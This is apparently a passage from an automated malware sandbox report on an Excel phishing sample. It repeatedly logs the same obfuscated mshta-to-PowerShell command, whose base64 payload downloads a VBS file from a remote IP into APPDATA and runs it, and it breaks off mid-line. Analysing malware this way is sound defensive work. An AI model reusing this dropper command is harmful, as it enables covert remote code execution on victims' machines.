              Source: Binary string: wntdll.pdb source: aspnet_compiler.exe, aspnet_compiler.exe, 0000001B.00000002.509949677.0000000000A60000.00000040.00001000.00020000.00000000.sdmp
              Source: Binary string: 7C:\Users\user\AppData\Local\Temp\xmqw35tj\xmqw35tj.pdbhP source: powershell.exe, 00000013.00000002.485237811.0000000002593000.00000004.00000800.00020000.00000000.sdmp
              Source: Binary string: 7C:\Users\user\AppData\Local\Temp\r3q12jmu\r3q12jmu.pdbhP source: powershell.exe, 00000008.00000002.448366945.00000000024F4000.00000004.00000800.00020000.00000000.sdmp
              Source: Binary string: 7C:\Users\user\AppData\Local\Temp\xmqw35tj\xmqw35tj.pdb source: powershell.exe, 00000013.00000002.485237811.0000000002593000.00000004.00000800.00020000.00000000.sdmp
              Source: PO#BBGR2411PO69.xlsInitial sample: OLE indicators encrypted = True

              Data Obfuscation

              barindex
              PowerShell case anomaly found
              Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" "/c pOWeRsHElL -EX bypaSs -nOP -W 1 -C DEVICEcReDenTialDePlOYMeNt ; INvOke-ExpREsSioN($(INvoKe-EXpREssion('[sYSTEM.tExt.ENCodIng]'+[cHaR]58+[cHAr]58+'utF8.gETsTrIng([sYSTEm.coNvErt]'+[CHaR]58+[ChAr]0X3A+'fromBaSe64striNg('+[ChaR]34+'JE95Q1A0TjJ6RklBICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhREQtdFlQRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1lTUJlUkRFRkluSVRpT04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJVckxNb04iLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgeWpCR1Usc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBmcixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIERFcSx1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBuVEd5VHNBbUdpayxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEtBRkspOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYW1FICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiaFdyZHhtVWFXZyIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uYU1FU1BhY2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFJ3VUdyUiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJE95Q1A0TjJ6RklBOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTQ2LjcwLjExMy4yMDAvMjMxL3NlZXRoZWJlc3RtYWdpY2FsdGhpZ25zZ2l2ZWdvb2Rmb3J1LnRJRiIsIiRFTlY6QVBQREFUQVxzZWV0aGViZXN0bWFnaWNhbHRoaWduc2dpdmVnb29kZm8udmJTIiwwLDApO3N0QXJULXNsRWVwKDMpO0lpICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJEVOdjpBUFBEQVRBXHNlZXRoZWJlc3RtYWdpY2FsdGhpZ25zZ2l2ZWdvb2Rmby52YlMi'+[CHaR]0X22+'))')))"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe pOWeRsHElL -EX bypaSs -nOP -W 1 -C DEVICEcReDenTialDePlOYMeNt ; INvOke-ExpREsSioN($(INvoKe-EXpREssion('[sYSTEM.tExt.ENCodIng]'+[cHaR]58+[cHAr]58+'utF8.gETsTrIng([sYSTEm.coNvErt]'+[CHaR]58+[ChAr]0X3A+'fromBaSe64striNg('+[ChaR]34+'JE95Q1A0TjJ6RklBICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhREQtdFlQRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1lTUJlUkRFRkluSVRpT04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJVckxNb04iLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgeWpCR1Usc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBmcixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIERFcSx1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBuVEd5VHNBbUdpayxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEtBRkspOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYW1FICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiaFdyZHhtVWFXZyIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uYU1FU1BhY2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFJ3VUdyUiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJE95Q1A0TjJ6RklBOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTQ2LjcwLjExMy4yMDAvMjMxL3NlZXRoZWJlc3RtYWdpY2FsdGhpZ25zZ2l2ZWdvb2Rmb3J1LnRJRiIsIiRFTlY6QVBQREFUQVxzZWV0aGViZXN0bWFnaWNhbHRoaWduc2dpdmVnb29kZm8udmJTIiwwLDApO3N0QXJULXNsRWVwKDMpO0lpICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJEVOdjpBUFBEQVRBXHNlZXRoZWJlc3RtYWdpY2FsdGhpZ25zZ2l2ZWdvb2Rmby52YlMi'+[CHaR]0X22+'))')))"
              Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" "/c pOWeRsHElL -EX bypaSs -nOP -W 1 -C DEVICEcReDenTialDePlOYMeNt ; INvOke-ExpREsSioN($(INvoKe-EXpREssion('[sYSTEM.tExt.ENCodIng]'+[cHaR]58+[cHAr]58+'utF8.gETsTrIng([sYSTEm.coNvErt]'+[CHaR]58+[ChAr]0X3A+'fromBaSe64striNg('+[ChaR]34+'JE95Q1A0TjJ6RklBICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhREQtdFlQRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1lTUJlUkRFRkluSVRpT04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJVckxNb04iLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgeWpCR1Usc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBmcixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIERFcSx1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBuVEd5VHNBbUdpayxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEtBRkspOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYW1FICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiaFdyZHhtVWFXZyIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uYU1FU1BhY2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFJ3VUdyUiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJE95Q1A0TjJ6RklBOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTQ2LjcwLjExMy4yMDAvMjMxL3NlZXRoZWJlc3RtYWdpY2FsdGhpZ25zZ2l2ZWdvb2Rmb3J1LnRJRiIsIiRFTlY6QVBQREFUQVxzZWV0aGViZXN0bWFnaWNhbHRoaWduc2dpdmVnb29kZm8udmJTIiwwLDApO3N0QXJULXNsRWVwKDMpO0lpICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJEVOdjpBUFBEQVRBXHNlZXRoZWJlc3RtYWdpY2FsdGhpZ25zZ2l2ZWdvb2Rmby52YlMi'+[CHaR]0X22+'))')))"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe pOWeRsHElL -EX bypaSs -nOP -W 1 -C DEVICEcReDenTialDePlOYMeNt ; INvOke-ExpREsSioN($(INvoKe-EXpREssion('[sYSTEM.tExt.ENCodIng]'+[cHaR]58+[cHAr]58+'utF8.gETsTrIng([sYSTEm.coNvErt]'+[CHaR]58+[ChAr]0X3A+'fromBaSe64striNg('+[ChaR]34+'JE95Q1A0TjJ6RklBICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhREQtdFlQRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1lTUJlUkRFRkluSVRpT04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJVckxNb04iLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgeWpCR1Usc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBmcixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIERFcSx1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBuVEd5VHNBbUdpayxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEtBRkspOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYW1FICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiaFdyZHhtVWFXZyIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uYU1FU1BhY2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFJ3VUdyUiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJE95Q1A0TjJ6RklBOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTQ2LjcwLjExMy4yMDAvMjMxL3NlZXRoZWJlc3RtYWdpY2FsdGhpZ25zZ2l2ZWdvb2Rmb3J1LnRJRiIsIiRFTlY6QVBQREFUQVxzZWV0aGViZXN0bWFnaWNhbHRoaWduc2dpdmVnb29kZm8udmJTIiwwLDApO3N0QXJULXNsRWVwKDMpO0lpICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJEVOdjpBUFBEQVRBXHNlZXRoZWJlc3RtYWdpY2FsdGhpZ25zZ2l2ZWdvb2Rmby52YlMi'+[CHaR]0X22+'))')))"
              Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" "/c pOWeRsHElL -EX bypaSs -nOP -W 1 -C DEVICEcReDenTialDePlOYMeNt ; INvOke-ExpREsSioN($(INvoKe-EXpREssion('[sYSTEM.tExt.ENCodIng]'+[cHaR]58+[cHAr]58+'utF8.gETsTrIng([sYSTEm.coNvErt]'+[CHaR]58+[ChAr]0X3A+'fromBaSe64striNg('+[ChaR]34+'JE95Q1A0TjJ6RklBICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhREQtdFlQRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1lTUJlUkRFRkluSVRpT04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJVckxNb04iLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgeWpCR1Usc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBmcixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIERFcSx1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBuVEd5VHNBbUdpayxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEtBRkspOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYW1FICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiaFdyZHhtVWFXZyIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uYU1FU1BhY2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFJ3VUdyUiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJE95Q1A0TjJ6RklBOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTQ2LjcwLjExMy4yMDAvMjMxL3NlZXRoZWJlc3RtYWdpY2FsdGhpZ25zZ2l2ZWdvb2Rmb3J1LnRJRiIsIiRFTlY6QVBQREFUQVxzZWV0aGViZXN0bWFnaWNhbHRoaWduc2dpdmVnb29kZm8udmJTIiwwLDApO3N0QXJULXNsRWVwKDMpO0lpICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJEVOdjpBUFBEQVRBXHNlZXRoZWJlc3RtYWdpY2FsdGhpZ25zZ2l2ZWdvb2Rmby52YlMi'+[CHaR]0X22+'))')))"Jump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe pOWeRsHElL -EX bypaSs -nOP -W 1 -C DEVICEcReDenTialDePlOYMeNt ; INvOke-ExpREsSioN($(INvoKe-EXpREssion('[sYSTEM.tExt.ENCodIng]'+[cHaR]58+[cHAr]58+'utF8.gETsTrIng([sYSTEm.coNvErt]'+[CHaR]58+[ChAr]0X3A+'fromBaSe64striNg('+[ChaR]34+'JE95Q1A0TjJ6RklBICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhREQtdFlQRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1lTUJlUkRFRkluSVRpT04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJVckxNb04iLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgeWpCR1Usc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBmcixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIERFcSx1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBuVEd5VHNBbUdpayxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEtBRkspOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYW1FICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiaFdyZHhtVWFXZyIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uYU1FU1BhY2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFJ3VUdyUiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJE95Q1A0TjJ6RklBOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTQ2LjcwLjExMy4yMDAvMjMxL3NlZXRoZWJlc3RtYWdpY2FsdGhpZ25zZ2l2ZWdvb2Rmb3J1LnRJRiIsIiRFTlY6QVBQREFUQVxzZWV0aGViZXN0bWFnaWNhbHRoaWduc2dpdmVnb29kZm8udmJTIiwwLDApO3N0QXJULXNsRWVwKDMpO0lpICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJEVOdjpBUFBEQVRBXHNlZXRoZWJlc3RtYWdpY2FsdGhpZ25zZ2l2ZWdvb2Rmby52YlMi'+[CHaR]0X22+'))')))"Jump to behavior
              Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" "/c pOWeRsHElL -EX bypaSs -nOP -W 1 -C DEVICEcReDenTialDePlOYMeNt ; INvOke-ExpREsSioN($(INvoKe-EXpREssion('[sYSTEM.tExt.ENCodIng]'+[cHaR]58+[cHAr]58+'utF8.gETsTrIng([sYSTEm.coNvErt]'+[CHaR]58+[ChAr]0X3A+'fromBaSe64striNg('+[ChaR]34+'JE95Q1A0TjJ6RklBICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhREQtdFlQRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1lTUJlUkRFRkluSVRpT04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJVckxNb04iLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgeWpCR1Usc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBmcixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIERFcSx1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBuVEd5VHNBbUdpayxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEtBRkspOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYW1FICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiaFdyZHhtVWFXZyIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uYU1FU1BhY2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFJ3VUdyUiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJE95Q1A0TjJ6RklBOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTQ2LjcwLjExMy4yMDAvMjMxL3NlZXRoZWJlc3RtYWdpY2FsdGhpZ25zZ2l2ZWdvb2Rmb3J1LnRJRiIsIiRFTlY6QVBQREFUQVxzZWV0aGViZXN0bWFnaWNhbHRoaWduc2dpdmVnb29kZm8udmJTIiwwLDApO3N0QXJULXNsRWVwKDMpO0lpICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJEVOdjpBUFBEQVRBXHNlZXRoZWJlc3RtYWdpY2FsdGhpZ25zZ2l2ZWdvb2Rmby52YlMi'+[CHaR]0X22+'))')))"Jump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe pOWeRsHElL -EX bypaSs -nOP -W 1 -C DEVICEcReDenTialDePlOYMeNt ; INvOke-ExpREsSioN($(INvoKe-EXpREssion('[sYSTEM.tExt.ENCodIng]'+[cHaR]58+[cHAr]58+'utF8.gETsTrIng([sYSTEm.coNvErt]'+[CHaR]58+[ChAr]0X3A+'fromBaSe64striNg('+[ChaR]34+'JE95Q1A0TjJ6RklBICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhREQtdFlQRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1lTUJlUkRFRkluSVRpT04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJVckxNb04iLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgeWpCR1Usc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBmcixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIERFcSx1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBuVEd5VHNBbUdpayxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEtBRkspOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYW1FICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiaFdyZHhtVWFXZyIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uYU1FU1BhY2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFJ3VUdyUiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJE95Q1A0TjJ6RklBOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTQ2LjcwLjExMy4yMDAvMjMxL3NlZXRoZWJlc3RtYWdpY2FsdGhpZ25zZ2l2ZWdvb2Rmb3J1LnRJRiIsIiRFTlY6QVBQREFUQVxzZWV0aGViZXN0bWFnaWNhbHRoaWduc2dpdmVnb29kZm8udmJTIiwwLDApO3N0QXJULXNsRWVwKDMpO0lpICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJEVOdjpBUFBEQVRBXHNlZXRoZWJlc3RtYWdpY2FsdGhpZ25zZ2l2ZWdvb2Rmby52YlMi'+[CHaR]0X22+'))')))"
              Suspicious command line found
              Source: C:\Windows\System32\mshta.exeProcess created: "C:\Windows\system32\cmd.exe" "/c pOWeRsHElL -EX bypaSs -nOP -W 1 -C DEVICEcReDenTialDePlOYMeNt ; INvOke-ExpREsSioN($(INvoKe-EXpREssion('[sYSTEM.tExt.ENCodIng]'+[cHaR]58+[cHAr]58+'utF8.gETsTrIng([sYSTEm.coNvErt]'+[CHaR]58+[ChAr]0X3A+'fromBaSe64striNg('+[ChaR]34+'JE95Q1A0TjJ6RklBICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhREQtdFlQRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1lTUJlUkRFRkluSVRpT04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJVckxNb04iLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgeWpCR1Usc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBmcixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIERFcSx1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBuVEd5VHNBbUdpayxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEtBRkspOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYW1FICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiaFdyZHhtVWFXZyIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uYU1FU1BhY2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFJ3VUdyUiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJE95Q1A0TjJ6RklBOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTQ2LjcwLjExMy4yMDAvMjMxL3NlZXRoZWJlc3RtYWdpY2FsdGhpZ25zZ2l2ZWdvb2Rmb3J1LnRJRiIsIiRFTlY6QVBQREFUQVxzZWV0aGViZXN0bWFnaWNhbHRoaWduc2dpdmVnb29kZm8udmJTIiwwLDApO3N0QXJULXNsRWVwKDMpO0lpICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJEVOdjpBUFBEQVRBXHNlZXRoZWJlc3RtYWdpY2FsdGhpZ25zZ2l2ZWdvb2Rmby52YlMi'+[CHaR]0X22+'))')))"
              Source: C:\Windows\System32\mshta.exeProcess created: "C:\Windows\system32\cmd.exe" "/c pOWeRsHElL -EX bypaSs -nOP -W 1 -C DEVICEcReDenTialDePlOYMeNt ; INvOke-ExpREsSioN($(INvoKe-EXpREssion('[sYSTEM.tExt.ENCodIng]'+[cHaR]58+[cHAr]58+'utF8.gETsTrIng([sYSTEm.coNvErt]'+[CHaR]58+[ChAr]0X3A+'fromBaSe64striNg('+[ChaR]34+'JE95Q1A0TjJ6RklBICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhREQtdFlQRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1lTUJlUkRFRkluSVRpT04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJVckxNb04iLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgeWpCR1Usc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBmcixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIERFcSx1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBuVEd5VHNBbUdpayxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEtBRkspOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYW1FICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiaFdyZHhtVWFXZyIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uYU1FU1BhY2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFJ3VUdyUiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJE95Q1A0TjJ6RklBOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTQ2LjcwLjExMy4yMDAvMjMxL3NlZXRoZWJlc3RtYWdpY2FsdGhpZ25zZ2l2ZWdvb2Rmb3J1LnRJRiIsIiRFTlY6QVBQREFUQVxzZWV0aGViZXN0bWFnaWNhbHRoaWduc2dpdmVnb29kZm8udmJTIiwwLDApO3N0QXJULXNsRWVwKDMpO0lpICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJEVOdjpBUFBEQVRBXHNlZXRoZWJlc3RtYWdpY2FsdGhpZ25zZ2l2ZWdvb2Rmby52YlMi'+[CHaR]0X22+'))')))"
              Source: C:\Windows\System32\mshta.exeProcess created: "C:\Windows\system32\cmd.exe" "/c pOWeRsHElL -EX bypaSs -nOP -W 1 -C DEVICEcReDenTialDePlOYMeNt ; 